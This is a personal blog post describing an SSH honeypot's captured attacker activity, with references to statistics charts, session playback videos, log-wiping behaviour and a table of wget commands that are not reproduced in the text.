SSH Server allows remote control and access the system. This article, I would like to present my analysis from captured files and activities by the attacker, which is trapped in our SSH-Honeypot.
In here also I am going to post several videos or playback screen of the attackers activity in my honeypot.
As few months back, I have launched my project “Capturing Malware with Honeypot on Unifi https://wnnsnn.wordpress.com/2012/09/19/malware-honeypot-on-unifi-dionaea/
Basically this project is something I interested in and is able to publish this to public base on my finding.
An SSH server is a software program which uses the secure shell protocol to accept connections from remote computers. SFTP/SCP file transfers and remote terminal connection are popular use cases for a SSH server.
SSH Server has been used widely by private sectors and government – example SSH Server has been deployed in DNS Server, Mail Server and mostly Linux & UNIX servers.
I would like to start this post with statistic and results I got from my honeypot.
Top 10 SSH clients
This vertical bar chart displays the top 10 SSH clients used by attackers during their hacking and total detected attempts.
Top 10 usernames
This vertical bar chart displays the top 10 usernames that attackers try when attacking the system.
Play back screen – watch this:
This video shows the attacker activity after they managed to guess password from my running kippo.
Play back screen – From log file – Deleting history and logs file from the attacker.
On this video you will find few methods and commands executed by the attacker in order to remove and to hide their activities.
From log file – wget commands
The following table diplays the latest “wget” commands entered by attackers in the honeypot system.